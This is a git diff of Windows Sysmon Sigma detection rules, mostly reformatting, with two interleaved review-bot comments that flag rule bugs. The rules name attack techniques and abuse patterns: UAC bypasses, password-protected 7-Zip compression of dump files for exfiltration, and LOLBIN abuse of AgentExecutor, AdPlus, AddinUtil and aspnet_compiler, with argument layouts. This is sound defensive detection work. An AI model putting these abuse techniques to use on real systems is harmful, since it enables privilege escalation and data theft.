diff --git a/sigma/sysmon/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml b/sigma/sysmon/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml
index 6b8ed89a8..2eae0be01 100644
--- a/sigma/sysmon/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml
+++ b/sigma/sysmon/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml
@@ -1,8 +1,7 @@
title: Function Call From Undocumented COM Interface EditionUpgradeManager
id: fb3722e4-1a06-46b6-b772-253e2e7db933
status: test
-description: Detects function calls from the EditionUpgradeManager COM interface.
- Which is an interface that is not used by standard executables.
+description: Detects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables.
references:
- https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/
- https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611
diff --git a/sigma/sysmon/process_access/proc_access_win_uac_bypass_wow64_logger.yml b/sigma/sysmon/process_access/proc_access_win_uac_bypass_wow64_logger.yml
index 9d663705d..3c878207c 100644
--- a/sigma/sysmon/process_access/proc_access_win_uac_bypass_wow64_logger.yml
+++ b/sigma/sysmon/process_access/proc_access_win_uac_bypass_wow64_logger.yml
@@ -1,8 +1,7 @@
title: UAC Bypass Using WOW64 Logger DLL Hijack
id: 4f6c43e2-f989-4ea5-bcd8-843b49a0317c
status: test
-description: Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe
- 30)
+description: Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)
references:
- https://github.com/hfiref0x/UACME
author: Christian Burkard (Nextron Systems)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml b/sigma/sysmon/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml
index 7038ee045..0f06b567d 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml
@@ -1,11 +1,10 @@
title: 7Zip Compressing Dump Files
id: ec570e53-4c76-45a9-804d-dc3f355ff7a7
related:
- - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc
- type: derived
+ - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc
+ type: derived
status: experimental
-description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump"
- extension, which could be a step in a process of dump file exfiltration.
+description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
references:
- https://thedfirreport.com/2022/09/26/bumblebee-round-two/
author: Nasreddine Bencherchali (Nextron Systems)
@@ -23,23 +22,22 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection_img:
- - Description|contains: 7-Zip
- - Image|endswith:
- - \7z.exe
- - \7zr.exe
- - \7za.exe
- - OriginalFileName:
- - 7z.exe
- - 7za.exe
+ - Description|contains: 7-Zip
+ - Image|endswith:
+ - \7z.exe
+ - \7zr.exe
+ - \7za.exe
+ - OriginalFileName:
+ - 7z.exe
+ - 7za.exe
selection_extension:
- CommandLine|contains:
+ CommandLine|contains:
- .dmp
- .dump
- .hdmp
condition: process_creation and (all of selection_*)
falsepositives:
- - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears
- accidentally
+ - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally
- Legitimate use of 7z to compress WER ".dmp" files for troubleshooting
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_7zip_password_compression.yml b/sigma/sysmon/process_creation/proc_creation_win_7zip_password_compression.yml
index e80e31f11..8cdc37ceb 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_7zip_password_compression.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_7zip_password_compression.yml
@@ -1,8 +1,7 @@
title: Compress Data and Lock With Password for Exfiltration With 7-ZIP
id: 9fbf5927-5261-4284-a71d-f681029ea574
status: test
-description: An adversary may compress or encrypt data that is collected prior to
- exfiltration using 3rd party utilities
+description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
author: frack113
@@ -20,18 +19,18 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection_img:
- - Description|contains: 7-Zip
- - Image|endswith:
- - \7z.exe
- - \7zr.exe
- - \7za.exe
- - OriginalFileName:
- - 7z.exe
- - 7za.exe
+ - Description|contains: 7-Zip
+ - Image|endswith:
+ - \7z.exe
+ - \7zr.exe
+ - \7za.exe
+ - OriginalFileName:
+ - 7z.exe
+ - 7za.exe
selection_password:
- CommandLine|contains: ' -p'
+ CommandLine|contains: ' -p'
selection_action:
- CommandLine|contains:
+ CommandLine|contains:
- ' a '
- ' u '
condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_7zip_password_extraction.yml b/sigma/sysmon/process_creation/proc_creation_win_7zip_password_extraction.yml
index f4416244f..4430fd5e9 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_7zip_password_extraction.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_7zip_password_extraction.yml
@@ -1,8 +1,7 @@ title: Password Protected Compressed File Extraction Via 7Zip id: b717b8fd-6467-4d7d-b3d3-27f9a463af77 status: experimental -description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract - password protected zip files. +description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files. references: - https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,22 +18,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Description|contains: 7-Zip - - Image|endswith: - - \7z.exe - - \7zr.exe - - \7za.exe - - OriginalFileName: - - 7z.exe - - 7za.exe + - Description|contains: 7-Zip + - Image|endswith: + - \7z.exe + - \7zr.exe + - \7za.exe + - OriginalFileName: + - 7z.exe + - 7za.exe selection_password: - CommandLine|contains|all: + CommandLine|contains|all: - ' -p' - ' x ' - ' -o' condition: process_creation and (all of selection_*) falsepositives: - - Legitimate activity is expected since extracting files with a password can be - common in some environment. + - Legitimate activity is expected since extracting files with a password can be common in some environment. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml b/sigma/sysmon/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml index 58937a8c9..a9724139c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml 
@@ -1,16 +1,11 @@ title: Suspicious AddinUtil.EXE CommandLine Execution id: 631b22a4-70f4-4e2f-9ea8-42f84d9df6d8 status: experimental -description: 'Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) - with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe - with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store - payload. - - ' +description: | + Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html -author: Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), - Tony Latteri (@TheLatteri) +author: Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) date: 2023/09/18 tags: - attack.defense_evasion @@ -24,21 +19,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \addinutil.exe - - OriginalFileName: AddInUtil.exe + - Image|endswith: \addinutil.exe + - OriginalFileName: AddInUtil.exe selection_susp_1_flags: - CommandLine|contains: + CommandLine|contains: - '-AddInRoot:' - '-PipelineRoot:' selection_susp_1_paths: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Temp\ - \Desktop\ - \Downloads\ - \Users\Public\ - \Windows\Temp\ selection_susp_2: - CommandLine|contains: + CommandLine|contains: - -AddInRoot:. - -AddInRoot:"." - -PipelineRoot:. 
@@ -49,8 +44,7 @@ detection: - \Downloads\ - \Users\Public\ - \Windows\Temp\ - condition: process_creation and (selection_img and (all of selection_susp_1_* - or selection_susp_2)) + condition: process_creation and (selection_img and (all of selection_susp_1_* or selection_susp_2)) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml index 58f8c5c68..949d505d2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml @@ -1,11 +1,8 @@ title: Uncommon Child Process Of AddinUtil.EXE id: b5746143-59d6-4603-8d06-acbd60e166ee status: experimental -description: 'Detects uncommon child processes of the Add-In deployment cache updating - utility (AddInutil.exe) which could be a sign of potential abuse of the binary - to proxy execution via a custom Addins.Store payload. - - ' +description: | + Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) diff --git a/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml b/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml index a108c7b65..6207b06cd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml 
@@ -1,12 +1,8 @@ title: Uncommon AddinUtil.EXE CommandLine Execution id: 4f2cd9b6-4a17-440f-bb2a-687abb65993a status: experimental -description: 'Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) - with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe - with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store - payload. - - ' +description: | + Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) @@ -23,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \addinutil.exe - - OriginalFileName: AddInUtil.exe + - Image|endswith: \addinutil.exe + - OriginalFileName: AddInUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '-AddInRoot:' - '-PipelineRoot:' filter_main_addinroot: - CommandLine|contains: + CommandLine|contains: - -AddInRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA - -AddInRoot:C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA - -PipelineRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA diff --git a/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml index 91aa6ec42..2c65c1e08 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml 
@@ -1,8 +1,7 @@ title: AddinUtil.EXE Execution From Uncommon Directory id: 6120ac2a-a34b-42c0-a9bd-1fb9f459f348 status: experimental -description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) - from a non-standard directory. +description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) @@ -19,8 +18,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \addinutil.exe - - OriginalFileName: AddInUtil.exe + - Image|endswith: \addinutil.exe + - OriginalFileName: AddInUtil.exe filter_main_legit_location: Image|contains: - :\Windows\Microsoft.NET\Framework\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_adplus_memory_dump.yml b/sigma/sysmon/process_creation/proc_creation_win_adplus_memory_dump.yml index 231dfe1ff..a2af25c61 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_adplus_memory_dump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_adplus_memory_dump.yml @@ -1,9 +1,7 @@ title: Potential Adplus.EXE Abuse id: 2f869d59-7f6a-4931-992c-cce556ff2d53 status: experimental -description: Detects execution of "AdPlus.exe", a binary that is part of the Windows - SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary - commands. +description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/ - https://twitter.com/nas_bench/status/1534916659676422152 
@@ -24,16 +22,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \adplus.exe - - OriginalFileName: Adplus.exe + - Image|endswith: \adplus.exe + - OriginalFileName: Adplus.exe selection_cli: - CommandLine|contains: + CommandLine|contains: + # Dump process memory - ' -hang ' - ' -pn ' - ' -pmn ' - ' -p ' - ' -po ' + # Using a config file - ' -c ' + # Execute commands inline - ' -sc ' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml index 1bd860418..7af8763d9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml @@ -1,13 +1,10 @@ title: AgentExecutor PowerShell Execution id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 related: - - id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab - type: similar + - id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab + type: similar status: test -description: Detects execution of the AgentExecutor.exe binary. Which can be abused - as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or - any binary named "powershell.exe" located in the path provided by 6th positional - argument +description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument author: Nasreddine Bencherchali (Nextron Systems), memory-shards references: - https://twitter.com/lefterispan/status/1286259016436514816 
@@ -27,15 +24,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image: \AgentExecutor.exe - - OriginalFileName: AgentExecutor.exe + - Image: \AgentExecutor.exe + - OriginalFileName: AgentExecutor.exe selection_cli: - CommandLine|contains: - - ' -powershell' + # Example: + # AgentExecutor.exe -powershell [scriptPath] [outputFilePath] [errorFilePath] [timeoutFilePath] [timeoutSeconds] [powershellPath] [enforceSignatureCheck] [runAs32BitOn64] + # Note: + # - If [timeoutSeconds] is NULL then it defaults to 60000 + # - If [enforceSignatureCheck] is: + # - "NULL" or "1" then a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy allsigned -file " + # - Else a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy bypass -file " + # - [powershellPath] is always concatendated to "powershell.exe" + CommandLine|contains: + - ' -powershell' # Also covers the "-powershellDetection" flag - ' -remediationScript' condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use via Intune management. You exclude script paths and names to - reduce FP rate + - Legitimate use via Intune management. You exclude script paths and names to reduce FP rate level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_susp_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_susp_usage.yml index 5fbbed0f3..e911854df 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_susp_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_agentexecutor_susp_usage.yml 
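Review bot: The new side of `selection_img` still carries `- Image: \AgentExecutor.exe`, a value without a modifier, which Sigma treats as an exact match; Sysmon writes the full path into `Image`, so a bare `\AgentExecutor.exe` can never be equal to it and this leg of the OR never fires, leaving the rule to rest on `OriginalFileName` alone. The sibling rule rewritten in this same commit (`proc_creation_win_agentexecutor_susp_usage.yml`) uses `Image|endswith: \AgentExecutor.exe`, which is presumably what was intended here as well; suggest `- Image|endswith: \AgentExecutor.exe`. Separately, the added comment block misspells `concatendated` (should be `concatenated`); the identical comment block is repeated in the susp_usage hunk and should be fixed there too.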
@@ -1,13 +1,10 @@ title: Suspicious AgentExecutor PowerShell Execution id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab related: - - id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 - type: similar + - id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 + type: similar status: test -description: Detects execution of the AgentExecutor.exe binary. Which can be abused - as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or - any binary named "powershell.exe" located in the path provided by 6th positional - argument +description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument author: Nasreddine Bencherchali (Nextron Systems), memory-shards references: - https://twitter.com/lefterispan/status/1286259016436514816 
@@ -27,14 +24,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \AgentExecutor.exe - - OriginalFileName: AgentExecutor.exe + - Image|endswith: \AgentExecutor.exe + - OriginalFileName: AgentExecutor.exe selection_cli: - CommandLine|contains: - - ' -powershell' + # Example: + # AgentExecutor.exe -powershell [scriptPath] [outputFilePath] [errorFilePath] [timeoutFilePath] [timeoutSeconds] [powershellPath] [enforceSignatureCheck] [runAs32BitOn64] + # Note: + # - If [timeoutSeconds] is NULL then it defaults to 60000 + # - If [enforceSignatureCheck] is: + # - "NULL" or "1" then a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy allsigned -file " + # - Else a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy bypass -file " + # - [powershellPath] is always concatendated to "powershell.exe" + CommandLine|contains: + - ' -powershell' # Also covers the "-powershellDetection" flag - ' -remediationScript' filter_main_pwsh: - CommandLine|contains: + CommandLine|contains: - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ - C:\Windows\System32\WindowsPowerShell\v1.0\ condition: process_creation and (all of selection_* and not 1 of filter_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml index 789086c84..573957983 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml 
@@ -1,17 +1,11 @@ title: Uncommon Child Process Of Appvlp.EXE id: 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43 status: test -description: 'Detects uncommon child processes of Appvlp.EXE - - Appvlp or the Application Virtualization Utility is included with Microsoft Office. - Attackers are able to abuse "AppVLP" to execute shell commands. - - Normally, this binary is used for Application Virtualization, but it can also - be abused to circumvent the ASR file path rule folder - +description: | + Detects uncommon child processes of Appvlp.EXE + Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. + Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file. - - ' references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/ author: Sreeman @@ -31,6 +25,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ParentImage|endswith: \appvlp.exe + # Note: Filters based on data from EchoTrail: https://www.echotrail.io/insights/search/appvlp.exe/ filter_main_generic: Image|endswith: - :\Windows\SysWOW64\rundll32.exe @@ -46,8 +41,7 @@ detection: filter_optional_office_msouc: Image|contains: :\Program Files\Microsoft Office Image|endswith: \MSOUC.EXE - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml b/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml index 4100224f7..4859dc778 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml @@ -1,15 +1,14 @@ title: AspNetCompiler Execution -id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 +id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec related: - - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 - type: similar - - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 - type: similar - - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 - type: similar + - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild + type: similar + - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File + type: similar + - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths + type: similar status: test -description: Detects execution of "aspnet_compiler.exe" which can be abused to compile - and execute C# code. +description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. references: - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/ - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml index 3ba255b92..75ce0c42b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml 
@@ -1,12 +1,12 @@ title: Suspicious Child Process of AspNetCompiler -id: 9ccba514-7cb6-4c5c-b377-700758f2f120 +id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild related: - - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 - type: similar - - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 - type: similar - - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 - type: similar + - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File + type: similar + - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths + type: similar + - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec + type: similar status: experimental description: Detects potentially suspicious child processes of "aspnet_compiler.exe". references: @@ -28,17 +28,18 @@ detection: selection_parent: ParentImage|endswith: \aspnet_compiler.exe selection_child: - - Image|endswith: - - \calc.exe - - \notepad.exe - - Image|contains: - - \Users\Public\ - - \AppData\Local\Temp\ - - \AppData\Local\Roaming\ - - :\Temp\ - - :\Windows\Temp\ - - :\Windows\System32\Tasks\ - - :\Windows\Tasks\ + # Note: add other potential suspicious child processes and paths + - Image|endswith: + - \calc.exe + - \notepad.exe + - Image|contains: + - \Users\Public\ + - \AppData\Local\Temp\ + - \AppData\Local\Roaming\ + - :\Temp\ + - :\Windows\Temp\ + - :\Windows\System32\Tasks\ + - :\Windows\Tasks\ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml b/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml index cabf01e3a..809b0e7e2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml 
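Review bot: The rewritten `Image|contains` list in `selection_child` keeps `\AppData\Local\Roaming\`, which is not a standard profile directory — Windows lays out `\AppData\Local\`, `\AppData\LocalLow\` and `\AppData\Roaming\` — so this entry most likely never matches and child processes dropped under the roaming profile are silently uncovered. If the roaming directory was the intent, the line should read `- \AppData\Roaming\`. The same string appears in the `CommandLine|contains` list of the suspicious-paths rule hunk in this commit (`proc_creation_win_aspnet_compiler_susp_paths.yml`) and would need the same correction.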
@@ -1,15 +1,14 @@ title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler -id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 +id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths related: - - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 - type: similar - - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 - type: similar - - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 - type: similar + - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild + type: similar + - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File + type: similar + - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec + type: similar status: experimental -description: Detects execution of "aspnet_compiler.exe" with potentially suspicious - paths for compilation. +description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation. references: - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/ - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ @@ -31,7 +30,8 @@ detection: - C:\Windows\Microsoft.NET\Framework\ - C:\Windows\Microsoft.NET\Framework64\ Image|endswith: \aspnet_compiler.exe - CommandLine|contains: + CommandLine|contains: + # Note: add other potential suspicious paths - \Users\Public\ - \AppData\Local\Temp\ - \AppData\Local\Roaming\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_at_interactive_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_at_interactive_execution.yml index a2a8a23b7..2412fcac5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_at_interactive_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_at_interactive_execution.yml 
@@ -1,8 +1,7 @@ title: Interactive AT Job id: 60fc936d-2eb0-4543-8a13-911c750a1dfc status: test -description: Detects an interactive AT job, which may be used as a form of privilege - escalation. +description: Detects an interactive AT job, which may be used as a form of privilege escalation. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md - https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html @@ -22,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \at.exe - CommandLine|contains: interactive + CommandLine|contains: interactive condition: process_creation and selection falsepositives: - Unlikely (at.exe deprecated as of Windows 8) diff --git a/sigma/sysmon/process_creation/proc_creation_win_attrib_hiding_files.yml b/sigma/sysmon/process_creation/proc_creation_win_attrib_hiding_files.yml index 36c3553d4..fd23ffbff 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_attrib_hiding_files.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_attrib_hiding_files.yml 
@@ -20,20 +20,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \attrib.exe - - OriginalFileName: ATTRIB.EXE + - Image|endswith: \attrib.exe + - OriginalFileName: ATTRIB.EXE selection_cli: - CommandLine|contains: ' +h ' + CommandLine|contains: ' +h ' filter_msiexec: - CommandLine|contains: '\desktop.ini ' + CommandLine|contains: '\desktop.ini ' filter_intel: ParentImage|endswith: \cmd.exe - CommandLine: +R +H +S +A \\\*.cui + CommandLine: +R +H +S +A \\\*.cui ParentCommandLine: C:\\WINDOWS\\system32\\\*.bat condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of - cmd.exe and igfxCUIService.exe is the parent of the cmd.exe) + - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe) - Msiexec.exe hiding desktop.ini level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_attrib_system.yml b/sigma/sysmon/process_creation/proc_creation_win_attrib_system.yml index 95c99addc..7d3bbf7bf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_attrib_system.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_attrib_system.yml 
